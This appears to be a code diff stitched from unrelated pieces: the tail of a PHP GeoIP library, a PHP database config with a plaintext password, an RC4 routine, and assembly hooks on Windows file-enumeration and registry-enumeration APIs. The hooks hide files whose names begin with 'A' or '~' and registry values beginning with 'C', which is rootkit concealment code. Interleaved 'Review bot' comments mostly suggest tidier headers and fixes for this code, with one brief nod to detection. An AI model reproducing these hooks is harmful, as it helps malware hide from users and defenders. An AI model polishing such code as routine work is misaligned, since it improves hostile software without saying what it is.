"Nepal", "Nauru", "Niue", "New Zealand", "Oman", "Panama", "Peru", "French Polynesia",
"Papua New Guinea", "Philippines", "Pakistan", "Poland", "Saint Pierre and Miquelon",
"Pitcairn Islands", "Puerto Rico", "Palestinian Territory",
"Portugal", "Palau", "Paraguay", "Qatar", "Reunion", "Romania",
"Russian Federation", "Rwanda", "Saudi Arabia", "Solomon Islands",
"Seychelles", "Sudan", "Sweden", "Singapore", "Saint Helena", "Slovenia",
"Svalbard and Jan Mayen", "Slovakia", "Sierra Leone", "San Marino", "Senegal",
"Somalia", "Suriname", "Sao Tome and Principe", "El Salvador", "Syrian Arab Republic",
"Swaziland", "Turks and Caicos Islands", "Chad", "French Southern Territories",
"Togo", "Thailand", "Tajikistan", "Tokelau", "Turkmenistan",
"Tunisia", "Tonga", "Timor-Leste", "Turkey", "Trinidad and Tobago", "Tuvalu",
"Taiwan", "Tanzania, United Republic of", "Ukraine",
"Uganda", "United States Minor Outlying Islands", "United States", "Uruguay",
"Uzbekistan", "Holy See (Vatican City State)", "Saint Vincent and the Grenadines",
"Venezuela", "Virgin Islands, British", "Virgin Islands, U.S.",
"Vietnam", "Vanuatu", "Wallis and Futuna", "Samoa", "Yemen", "Mayotte",
"Serbia", "South Africa", "Zambia", "Montenegro", "Zimbabwe",
"Anonymous Proxy","Satellite Provider","Other",
"Aland Islands","Guernsey","Isle of Man","Jersey","Saint Barthelemy","Saint Martin"
);
var $GEOIP_CONTINENT_CODES = array(
"--", "AS", "EU", "EU", "AS", "AS", "NA", "NA", "EU", "AS",
"NA", "AF", "AN", "SA", "OC", "EU", "OC", "NA", "AS", "EU",
"NA", "AS", "EU", "AF", "EU", "AS", "AF", "AF", "NA", "AS",
"SA", "SA", "NA", "AS", "AN", "AF", "EU", "NA", "NA", "AS",
"AF", "AF", "AF", "EU", "AF", "OC", "SA", "AF", "AS", "SA",
"NA", "NA", "AF", "AS", "AS", "EU", "EU", "AF", "EU", "NA",
"NA", "AF", "SA", "EU", "AF", "AF", "AF", "EU", "AF", "EU",
"OC", "SA", "OC", "EU", "EU", "EU", "AF", "EU", "NA", "AS",
"SA", "AF", "EU", "NA", "AF", "AF", "NA", "AF", "EU", "AN",
"NA", "OC", "AF", "SA", "AS", "AN", "NA", "EU", "NA", "EU",
"AS", "EU", "AS", "AS", "AS", "AS", "AS", "EU", "EU", "NA",
"AS", "AS", "AF", "AS", "AS", "OC", "AF", "NA", "AS", "AS",
"AS", "NA", "AS", "AS", "AS", "NA", "EU", "AS", "AF", "AF",
"EU", "EU", "EU", "AF", "AF", "EU", "EU", "AF", "OC", "EU",
"AF", "AS", "AS", "AS", "OC", "NA", "AF", "NA", "EU", "AF",
"AS", "AF", "NA", "AS", "AF", "AF", "OC", "AF", "OC", "AF",
"NA", "EU", "EU", "AS", "OC", "OC", "OC", "AS", "NA", "SA",
"OC", "OC", "AS", "AS", "EU", "NA", "OC", "NA", "AS", "EU",
"OC", "SA", "AS", "AF", "EU", "EU", "AF", "AS", "OC", "AF",
"AF", "EU", "AS", "AF", "EU", "EU", "EU", "AF", "EU", "AF",
"AF", "SA", "AF", "NA", "AS", "AF", "NA", "AF", "AN", "AF",
"AS", "AS", "OC", "AS", "AF", "OC", "AS", "EU", "NA", "OC",
"AS", "AF", "EU", "AF", "OC", "NA", "SA", "AS", "EU", "NA",
"SA", "NA", "NA", "AS", "OC", "OC", "OC", "AS", "AF", "EU",
"AF", "AF", "EU", "AF", "--", "--", "--", "EU", "EU", "EU",
"EU", "NA", "NA"
);
}
function geoip_load_shared_mem ($file) {
$fp = fopen($file, "rb");
if (!$fp) {
print "error opening $file: $php_errormsg\n";
exit;
}
$s_array = fstat($fp);
$size = $s_array['size'];
if ($shmid = @shmop_open (GEOIP_SHM_KEY, "w", 0, 0)) {
shmop_delete ($shmid);
shmop_close ($shmid);
}
$shmid = shmop_open (GEOIP_SHM_KEY, "c", 0644, $size);
shmop_write ($shmid, fread($fp, $size), 0);
shmop_close ($shmid);
}
function _setup_segments($gi){
$gi->databaseType = GEOIP_COUNTRY_EDITION;
$gi->record_length = STANDARD_RECORD_LENGTH;
if ($gi->flags & GEOIP_SHARED_MEMORY) {
$offset = @shmop_size ($gi->shmid) - 3;
for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) {
$delim = @shmop_read ($gi->shmid, $offset, 3);
$offset += 3;
if ($delim == (chr(255).chr(255).chr(255))) {
$gi->databaseType = ord(@shmop_read ($gi->shmid, $offset, 1));
$offset++;
if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV0;
} else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV1;
} else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0)||
($gi->databaseType == GEOIP_CITY_EDITION_REV1)
|| ($gi->databaseType == GEOIP_ORG_EDITION)
|| ($gi->databaseType == GEOIP_ORG_EDITION_V6)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6)
|| ($gi->databaseType == GEOIP_ISP_EDITION)
|| ($gi->databaseType == GEOIP_ISP_EDITION_V6)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION_V6)
|| ($gi->databaseType == GEOIP_LOCATIONA_EDITION)
|| ($gi->databaseType == GEOIP_ACCURACYRADIUS_EDITION)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION_V6)){
$gi->databaseSegments = 0;
$buf = @shmop_read ($gi->shmid, $offset, SEGMENT_RECORD_LENGTH);
for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){
$gi->databaseSegments += (ord($buf[$j]) << ($j * 8));
}
if (($gi->databaseType == GEOIP_ORG_EDITION)
|| ($gi->databaseType == GEOIP_ORG_EDITION_V6)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6)
|| ($gi->databaseType == GEOIP_ISP_EDITION)
|| ($gi->databaseType == GEOIP_ISP_EDITION_V6)) {
$gi->record_length = ORG_RECORD_LENGTH;
}
}
break;
} else {
$offset -= 4;
}
}
if (($gi->databaseType == GEOIP_COUNTRY_EDITION)||
($gi->databaseType == GEOIP_COUNTRY_EDITION_V6)||
($gi->databaseType == GEOIP_PROXY_EDITION)||
($gi->databaseType == GEOIP_NETSPEED_EDITION)){
$gi->databaseSegments = GEOIP_COUNTRY_BEGIN;
}
} else {
$filepos = ftell($gi->filehandle);
fseek($gi->filehandle, -3, SEEK_END);
for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) {
$delim = fread($gi->filehandle,3);
if ($delim == (chr(255).chr(255).chr(255))){
$gi->databaseType = ord(fread($gi->filehandle,1));
if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV0;
}
else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1){
$gi->databaseSegments = GEOIP_STATE_BEGIN_REV1;
} else if (($gi->databaseType == GEOIP_CITY_EDITION_REV0)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_ORG_EDITION)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION)
|| ($gi->databaseType == GEOIP_ISP_EDITION)
|| ($gi->databaseType == GEOIP_ORG_EDITION_V6)
|| ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6)
|| ($gi->databaseType == GEOIP_ISP_EDITION_V6)
|| ($gi->databaseType == GEOIP_LOCATIONA_EDITION)
|| ($gi->databaseType == GEOIP_ACCURACYRADIUS_EDITION)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6)
|| ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1)
|| ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1_V6)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION)
|| ($gi->databaseType == GEOIP_USERTYPE_EDITION_V6)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION)
|| ($gi->databaseType == GEOIP_ASNUM_EDITION_V6)){
$gi->databaseSegments = 0;
$buf = fread($gi->filehandle,SEGMENT_RECORD_LENGTH);
for ($j = 0;$j < SEGMENT_RECORD_LENGTH;$j++){
$gi->databaseSegments += (ord($buf[$j]) << ($j * 8));
}
if ( ( $gi->databaseType == GEOIP_ORG_EDITION )
|| ( $gi->databaseType == GEOIP_DOMAIN_EDITION )
|| ( $gi->databaseType == GEOIP_ISP_EDITION )
|| ( $gi->databaseType == GEOIP_ORG_EDITION_V6 )
|| ( $gi->databaseType == GEOIP_DOMAIN_EDITION_V6 )
|| ( $gi->databaseType == GEOIP_ISP_EDITION_V6 )) {
$gi->record_length = ORG_RECORD_LENGTH;
}
}
break;
} else {
fseek($gi->filehandle, -4, SEEK_CUR);
}
}
if (($gi->databaseType == GEOIP_COUNTRY_EDITION)||
($gi->databaseType == GEOIP_COUNTRY_EDITION_V6)||
($gi->databaseType == GEOIP_PROXY_EDITION)||
($gi->databaseType == GEOIP_NETSPEED_EDITION)){
$gi->databaseSegments = GEOIP_COUNTRY_BEGIN;
}
fseek($gi->filehandle,$filepos,SEEK_SET);
}
return $gi;
}
function geoip_open($filename, $flags) {
$gi = new GeoIP;
$gi->flags = $flags;
if ($gi->flags & GEOIP_SHARED_MEMORY) {
$gi->shmid = @shmop_open (GEOIP_SHM_KEY, "a", 0, 0);
} else {
$gi->filehandle = fopen($filename,"rb") or die( "Can not open $filename\n" );
if ($gi->flags & GEOIP_MEMORY_CACHE) {
$s_array = fstat($gi->filehandle);
$gi->memory_buffer = fread($gi->filehandle, $s_array['size']);
}
}
$gi = _setup_segments($gi);
return $gi;
}
function geoip_close($gi) {
if ($gi->flags & GEOIP_SHARED_MEMORY) {
return true;
}
return fclose($gi->filehandle);
}
function geoip_country_id_by_name_v6($gi, $name) {
$rec = dns_get_record($name, DNS_AAAA);
if ( !$rec ) {
return false;
}
$addr = $rec[0]["ipv6"];
if (!$addr || $addr == $name) {
return false;
}
return geoip_country_id_by_addr_v6($gi, $addr);
}
function geoip_country_id_by_name($gi, $name) {
$addr = gethostbyname($name);
if (!$addr || $addr == $name) {
return false;
}
return geoip_country_id_by_addr($gi, $addr);
}
function geoip_country_code_by_name_v6($gi, $name) {
$country_id = geoip_country_id_by_name_v6($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
return false;
}
function geoip_country_code_by_name($gi, $name) {
$country_id = geoip_country_id_by_name($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
return false;
}
function geoip_country_name_by_name_v6($gi, $name) {
$country_id = geoip_country_id_by_name_v6($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
return false;
}
function geoip_country_name_by_name($gi, $name) {
$country_id = geoip_country_id_by_name($gi,$name);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
return false;
}
function geoip_country_id_by_addr_v6($gi, $addr) {
$ipnum = inet_pton($addr);
return _geoip_seek_country_v6($gi, $ipnum) - GEOIP_COUNTRY_BEGIN;
}
function geoip_country_id_by_addr($gi, $addr) {
$ipnum = ip2long($addr);
return _geoip_seek_country($gi, $ipnum) - GEOIP_COUNTRY_BEGIN;
}
function geoip_country_code_by_addr_v6($gi, $addr) {
$country_id = geoip_country_id_by_addr_v6($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
return false;
}
function geoip_country_code_by_addr($gi, $addr) {
if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
$record = geoip_record_by_addr($gi,$addr);
if ( $record !== false ) {
return $record->country_code;
}
} else {
$country_id = geoip_country_id_by_addr($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_CODES[$country_id];
}
}
return false;
}
function geoip_country_name_by_addr_v6($gi, $addr) {
$country_id = geoip_country_id_by_addr_v6($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
return false;
}
function geoip_country_name_by_addr($gi, $addr) {
if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) {
$record = geoip_record_by_addr($gi,$addr);
return $record->country_name;
} else {
$country_id = geoip_country_id_by_addr($gi,$addr);
if ($country_id !== false) {
return $gi->GEOIP_COUNTRY_NAMES[$country_id];
}
}
return false;
}
function _geoip_seek_country_v6($gi, $ipnum) {
# arrays from unpack start with offset 1
# yet another php mystery. array_merge work around
# this broken behaviour
$v6vec = array_merge(unpack( "C16", $ipnum));
$offset = 0;
for ($depth = 127; $depth >= 0; --$depth) {
if ($gi->flags & GEOIP_MEMORY_CACHE) {
// workaround php's broken substr, strpos, etc handling with
// mbstring.func_overload and mbstring.internal_encoding
$enc = mb_internal_encoding();
mb_internal_encoding('ISO-8859-1');
$buf = substr($gi->memory_buffer,
2 * $gi->record_length * $offset,
2 * $gi->record_length);
mb_internal_encoding($enc);
} elseif ($gi->flags & GEOIP_SHARED_MEMORY) {
$buf = @shmop_read ($gi->shmid,
2 * $gi->record_length * $offset,
2 * $gi->record_length );
} else {
fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0
or die("fseek failed");
$buf = fread($gi->filehandle, 2 * $gi->record_length);
}
$x = array(0,0);
for ($i = 0; $i < 2; ++$i) {
for ($j = 0; $j < $gi->record_length; ++$j) {
$x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8);
}
}
$bnum = 127 - $depth;
$idx = $bnum >> 3;
$b_mask = 1 << ( $bnum & 7 ^ 7 );
if (($v6vec[$idx] & $b_mask) > 0) {
if ($x[1] >= $gi->databaseSegments) {
return $x[1];
}
$offset = $x[1];
} else {
if ($x[0] >= $gi->databaseSegments) {
return $x[0];
}
$offset = $x[0];
}
}
trigger_error("error traversing database - perhaps it is corrupt?", E_USER_ERROR);
return false;
}
function _geoip_seek_country($gi, $ipnum) {
$offset = 0;
for ($depth = 31; $depth >= 0; --$depth) {
if ($gi->flags & GEOIP_MEMORY_CACHE) {
// workaround php's broken substr, strpos, etc handling with
// mbstring.func_overload and mbstring.internal_encoding
$enc = mb_internal_encoding();
mb_internal_encoding('ISO-8859-1');
$buf = substr($gi->memory_buffer,
2 * $gi->record_length * $offset,
2 * $gi->record_length);
mb_internal_encoding($enc);
} elseif ($gi->flags & GEOIP_SHARED_MEMORY) {
$buf = @shmop_read ($gi->shmid,
2 * $gi->record_length * $offset,
2 * $gi->record_length );
} else {
fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0
or die("fseek failed");
$buf = fread($gi->filehandle, 2 * $gi->record_length);
}
$x = array(0,0);
for ($i = 0; $i < 2; ++$i) {
for ($j = 0; $j < $gi->record_length; ++$j) {
$x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8);
}
}
if ($ipnum & (1 << $depth)) {
if ($x[1] >= $gi->databaseSegments) {
return $x[1];
}
$offset = $x[1];
} else {
if ($x[0] >= $gi->databaseSegments) {
return $x[0];
}
$offset = $x[0];
}
}
trigger_error("error traversing database - perhaps it is corrupt?", E_USER_ERROR);
return false;
}
function _common_get_org($gi, $seek_org){
$record_pointer = $seek_org + (2 * $gi->record_length - 1) * $gi->databaseSegments;
if ($gi->flags & GEOIP_SHARED_MEMORY) {
$org_buf = @shmop_read ($gi->shmid, $record_pointer, MAX_ORG_RECORD_LENGTH);
} else {
fseek($gi->filehandle, $record_pointer, SEEK_SET);
$org_buf = fread($gi->filehandle,MAX_ORG_RECORD_LENGTH);
}
// workaround php's broken substr, strpos, etc handling with
// mbstring.func_overload and mbstring.internal_encoding
$enc = mb_internal_encoding();
mb_internal_encoding('ISO-8859-1');
$org_buf = substr($org_buf, 0, strpos($org_buf, "\0"));
mb_internal_encoding($enc);
return $org_buf;
}
function _get_org_v6($gi,$ipnum){
$seek_org = _geoip_seek_country_v6($gi,$ipnum);
if ($seek_org == $gi->databaseSegments) {
return NULL;
}
return _common_get_org($gi, $seek_org);
}
function _get_org($gi,$ipnum){
$seek_org = _geoip_seek_country($gi,$ipnum);
if ($seek_org == $gi->databaseSegments) {
return NULL;
}
return _common_get_org($gi, $seek_org);
}
function geoip_name_by_addr_v6 ($gi,$addr) {
if ($addr == NULL) {
return 0;
}
$ipnum = inet_pton($addr);
return _get_org_v6($gi, $ipnum);
}
function geoip_name_by_addr ($gi,$addr) {
if ($addr == NULL) {
return 0;
}
$ipnum = ip2long($addr);
return _get_org($gi, $ipnum);
}
function geoip_org_by_addr ($gi,$addr) {
return geoip_name_by_addr($gi, $addr);
}
function _get_region($gi,$ipnum){
if ($gi->databaseType == GEOIP_REGION_EDITION_REV0){
$seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV0;
if ($seek_region >= 1000){
$country_code = "US";
$region = chr(($seek_region - 1000)/26 + 65) . chr(($seek_region - 1000)%26 + 65);
} else {
$country_code = $gi->GEOIP_COUNTRY_CODES[$seek_region];
$region = "";
}
return array ($country_code,$region);
} else if ($gi->databaseType == GEOIP_REGION_EDITION_REV1) {
$seek_region = _geoip_seek_country($gi,$ipnum) - GEOIP_STATE_BEGIN_REV1;
//print $seek_region;
if ($seek_region < US_OFFSET){
$country_code = "";
$region = "";
} else if ($seek_region < CANADA_OFFSET) {
$country_code = "US";
$region = chr(($seek_region - US_OFFSET)/26 + 65) . chr(($seek_region - US_OFFSET)%26 + 65);
} else if ($seek_region < WORLD_OFFSET) {
$country_code = "CA";
$region = chr(($seek_region - CANADA_OFFSET)/26 + 65) . chr(($seek_region - CANADA_OFFSET)%26 + 65);
} else {
$country_code = $gi->GEOIP_COUNTRY_CODES[($seek_region - WORLD_OFFSET) / FIPS_RANGE];
$region = "";
}
return array ($country_code,$region);
}
}
function geoip_region_by_addr ($gi,$addr) {
if ($addr == NULL) {
return 0;
}
$ipnum = ip2long($addr);
return _get_region($gi, $ipnum);
}
function getdnsattributes ($l,$ip){
$r = new Net_DNS_Resolver();
$r->nameservers = array("ws1.maxmind.com");
$p = $r->search($l."." . $ip .".s.maxmind.com","TXT","IN");
$str = is_object($p->answer[0])?$p->answer[0]->string():'';
$str = substr( $str, 1, -1 );
return $str;
}
?>


@@ -0,0 +1,11 @@
<?php
$mysqlhost = "localhost";
$mysqlname = "hunt";
$mysqlpass = "pass";
$mysqlbase = "hunt";
mysql_connect($mysqlhost, $mysqlname, $mysqlpass) or die("Could not connect to database: " . mysql_error());
mysql_select_db($mysqlbase) or die("Could not select database : " . mysql_error());
?>
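Review bot: The database credentials sit in plain text in the four assignments at the top of the file, and `mysql_connect`/`mysql_select_db` come from the `mysql_*` extension, which was deprecated in PHP 5.5 and removed in 7.0, so the file fails on any current interpreter. Both `or die("... " . mysql_error())` calls also print the driver's error text into the HTTP response. The conventional shape is a `mysqli_connect` or PDO call with the settings read from a file outside the web root; at minimum a header such as `// Panel DB settings (mysql_* API: deprecated 5.5, removed 7.0)` should record the dependency.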


@@ -0,0 +1,35 @@
<?php
function encrypt ($pwd, $data, $ispwdHex = 0) {
if ($ispwdHex) $pwd = @pack('H*', $pwd); // valid input, please!
$key[] = '';
$box[] = '';
$cipher = '';
$pwd_length = strlen($pwd);
$data_length = strlen($data);
for ($i = 0; $i < 256; $i++) {
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[(($box[$a] + $box[$j]) % 256)];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
?>
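Review bot: `encrypt` evaluates `$i % $pwd_length` without checking for an empty key, so an empty `$pwd` (or a hex string that `@pack('H*', ...)` silently reduces to nothing) hits a modulo-by-zero on the first iteration; a guard such as `if ($pwd_length === 0) return false;` belongs before the loops. The body is the RC4 key schedule followed by the keystream XOR, the output has the same length as `$data`, and because RC4 is symmetric the same call decrypts — none of which the name or the comment `// valid input, please!` conveys, and RC4 provides no integrity and is considered broken (RFC 7465). Suggested header: `// RC4 (KSA + PRGA). $pwd: raw key bytes, or hex when $ispwdHex. Returns ciphertext of strlen($data); the function is its own inverse.` Separately, `$key[] = ''; $box[] = '';` only seed element 0 with a string the first loop overwrites; `$key = array(); $box = array();` says what is meant.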


@@ -0,0 +1,109 @@
.code
;; -------------------------------------------------------------------------------- ;;
NewFindFirstFileEx proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword
push p6 ; dwAdditionalFlags
push p5 ; lpSearchFilter
push p4 ; fSearchOp
push p3 ; lpFindFileData
push p2 ; fInfoLevelId
push p1 ; lpFileName
call eax ; Real FindFirstFileEx
.if eax==INVALID_HANDLE_VALUE
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p3
add ebx, 44 ; FileName offset in WIN32_FIND_DATA struc
call IsHiddenFile
.if ebx==0
popad
ret
.endif
; Hide file (replace by next)
invoke FindNextFileW, eax, p3
.if eax!=0
popad
ret
.endif
; If hidden file was last
invoke SetLastError, ERROR_FILE_NOT_FOUND
popad
xor eax, eax
ret
NewFindFirstFileEx endp
;; -------------------------------------------------------------------------------- ;;
NewFindFirstFile proc p1:dword, p2:dword
push p2 ; lpFindFileData
push p1 ; lpFileName
call eax ; Real FindFirstFile
.if eax==INVALID_HANDLE_VALUE
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p2
add ebx, 44 ; FileName offset in WIN32_FIND_DATA struc
call IsHiddenFile
.if ebx==0
popad
ret
.endif
; Hide file (replace by next)
invoke FindNextFileW, eax, p2
.if eax!=0
popad
ret
.endif
; If hidden file was last
invoke SetLastError, ERROR_FILE_NOT_FOUND
popad
xor eax, eax
ret
NewFindFirstFile endp
;; -------------------------------------------------------------------------------- ;;
NewFindNextFile proc p1:dword, p2:dword
local RealFindNextFile : dword
mov RealFindNextFile, eax
@FindNextFile:
push p2 ; lpFindFileData
push p1 ; hFindFile
call RealFindNextFile ; Real FindNextFile
.if eax==0
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p2
add ebx, 44 ; FileName offset in WIN32_FIND_DATA struc
call IsHiddenFile
.if ebx==0
popad
ret
.endif
; Hide file (replace by next)
popad
jmp @FindNextFile
NewFindNextFile endp
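Review bot: All three procs rely on an undocumented contract — the real API's address arrives in `eax` (`call eax` in the first two, `mov RealFindNextFile, eax` in the third) while the stack carries the hooked call's own arguments — and nothing at the top of the file says so; a header per proc naming the `eax` input, the stack arguments and the clobbers is the first thing a reader needs. The literal `44` repeated in each proc is the byte offset of `cFileName` in `WIN32_FIND_DATA`; one `FIND_DATA_FILENAME_OFFS equ 44 ; WIN32_FIND_DATA.cFileName` (or the struc field itself) keeps the three in step. `NewFindFirstFileEx` and `NewFindFirstFile` call `FindNextFileW` unconditionally and, when that fails, return `0` via `xor eax, eax`, whereas the API they replace reports failure as `INVALID_HANDLE_VALUE` and the find handle is never closed; the header should record these deviations from the real API's contract. From the defender's side, this `pushad`/filter/`popad` around a `FindNextFileW` call is the classic user-mode directory-listing filter, and it is what cross-view enumeration checks (raw `NtQueryDirectoryFile` against the Win32 listing) surface.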


@@ -0,0 +1,53 @@
.data
nHdnCount dd 0 ; Hidden records counter (for delta)
.code
;; -------------------------------------------------------------------------------- ;;
NewRegEnumValue proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword
local RealRegEnumValue : dword
mov RealRegEnumValue, eax
; Init counter if search from begining
.if p2==0
mov nHdnCount, 0
; else add delta to dwIndex
.else
mov eax, nHdnCount
add p2, eax
.endif
@RealRegEnumValue:
push p8 ; lpcbData
push p7 ; lpData
push p6 ; lpType
push p5 ; lpReserved
push p4 ; lpcchValueName
push p3 ; lpValueName
push p2 ; dwIndex
push p1 ; hKey
call RealRegEnumValue ; Real RegEnumValue
.if eax!=ERROR_SUCCESS
ret
.endif
pushad
; Decision: to hide or not to hide
mov ebx, p3
call IsHiddenRegValue
.if ebx==0
popad
ret
.endif
; Hide Value (replace by next)
inc p2 ; Next dwIndex
inc nHdnCount ; Increase counter (for delta)
popad
jmp @RealRegEnumValue
NewRegEnumValue endp
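Review bot: `nHdnCount` is a single process-wide counter in `.data`, reset only when a caller passes `dwIndex == 0`, so two interleaved enumerations (different keys, or different threads) share one delta; the comment `; Hidden records counter (for delta)` should say `; process-wide, not per hKey; reset only on dwIndex==0`. `add p2, eax` and `inc p2` write into the caller's argument slot and the later `push p2` re-reads it — correct for a MASM `proc` parameter, but worth a comment so nobody assumes the caller's own `dwIndex` is being modified. The real API pointer again arrives in `eax` (`mov RealRegEnumValue, eax`), an unstated contract shared with the file-enumeration hooks in the sibling file. `call IsHiddenRegValue` inspects a single byte of `lpValueName` regardless of whether the A or W entry point is hooked; the comment at the call should state which encoding is assumed.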


@@ -0,0 +1,34 @@
.code
;; -------------------------------------------------------------------------------- ;;
IsHiddenFile proc
cmp byte ptr [ebx], "A"
je @hide
cmp byte ptr [ebx], "~"
je @hide
;; Not hide
xor ebx, ebx
ret
@hide:
ret
IsHiddenFile endp
;; -------------------------------------------------------------------------------- ;;
IsHiddenRegValue proc
cmp byte ptr [ebx], "C"
je @hide
;; Not hide
xor ebx, ebx
ret
@hide:
ret
IsHiddenRegValue endp
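Review bot: Both procs use an unusual register contract — pointer in `ebx`, result in `ebx` (left unchanged to mean "hide", zeroed to mean "do not hide"), flags clobbered — and neither carries a header stating it, even though every caller in the other files depends on it. Suggest per proc: `; In:  ebx -> name (first byte tested)` / `; Out: ebx = 0 -> not hidden, else unchanged` / `; Clob: flags`. The test itself is a single-byte prefix match (`cmp byte ptr [ebx], "A"` / `"~"`, and `"C"` for values), so on a Unicode name it reads the low byte of the first WCHAR; a comment such as `; matches every name whose first byte is 'A' or '~'` makes both the assumed encoding and the breadth of the rule explicit instead of implied.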


@@ -0,0 +1,117 @@
FILE_BOTH_DIRECTORY_INFORMATION struc
NextEntryOffset dd ?
Unknown dd ?
CreationTime dq ?
LastAccessTime dq ?
LastWriteTime dq ?
ChangeTime dq ?
EndOfFile dq ?
AllocationSize dq ?
FileAttributes dd ?
FileNameLength dd ?
EaInformationLength dd ?
AlternateNameLength db ?
_DummyAlign db ?
AlternateName dw 12 dup (?)
FileName dw ?
FILE_BOTH_DIRECTORY_INFORMATION ends
.code
;; -------------------------------------------------------------------------------- ;;
NewZwQueryDirectoryFile proc p1:dword, p2:dword, p3:dword, p4:dword, p5:dword, p6:dword, p7:dword, p8:dword, p9:dword, p10:dword, p11:dword
local RealZwQueryDirectoryFile : dword
mov RealZwQueryDirectoryFile, eax
@NextQuery:
push p11 ; RestartScan
push p10 ; FileName
push p9 ; ReturnSingleEntry
push p8 ; FileInformationClass
push p7 ; FileInformationLength
push p6 ; FileInformation
push p5 ; IoStatusBlock
push p4 ; ApcContext
push p3 ; ApcRoutine
push p2 ; Event
push p1 ; FileHandle
call RealZwQueryDirectoryFile ; Real ZwQueryDirectoryFile
.if eax!=STATUS_SUCCESS
ret
.endif
; Only FileBothDirectoryInformation
.if p8!=3
ret
.endif
; Only not empty struc
.if p6==0
ret
.endif
pushad
assume eax : ptr FILE_BOTH_DIRECTORY_INFORMATION, edx : ptr FILE_BOTH_DIRECTORY_INFORMATION
mov eax, p6
@NextFname:
; Decision: to hide or not to hide
lea ebx, [eax].FileName
call IsHiddenFile
.if ebx!=0
.if eax==p6 ; First record
.if p9==TRUE
popad
jmp @NextQuery
.elseif [eax].NextEntryOffset==0 ; Only 1 record
popad
mov eax, STATUS_NO_MORE_FILES
ret
.endif
mov ebx, [eax].NextEntryOffset ; 1st record len
mov edx, eax ; 2nd -
add edx, ebx ; record addr
mov ecx, [edx].NextEntryOffset ; 2nd record len
.if ecx==0
mov ecx, sizeof FILE_BOTH_DIRECTORY_INFORMATION
add ecx, [edx].FileNameLength
.else
add [edx].NextEntryOffset, ebx ; offset = len2 + len1
.endif
mov esi, edx ; Source
mov edi, eax ; Destination
rep movsb
mov edx, eax
.elseif [eax].NextEntryOffset==0 ; Last record
mov [edx].NextEntryOffset, 0
.else ; Other records
mov ecx, [eax].NextEntryOffset
add ecx, [edx].NextEntryOffset
mov [edx].NextEntryOffset, ecx
.endif
.else
mov edx, eax
.endif
; Exit if no more records
cmp [eax].NextEntryOffset, 0
je @End
; Check Next record
add eax, [eax].NextEntryOffset
jmp @NextFname
@End:
assume eax : nothing, edx : nothing
popad
ret
NewZwQueryDirectoryFile endp
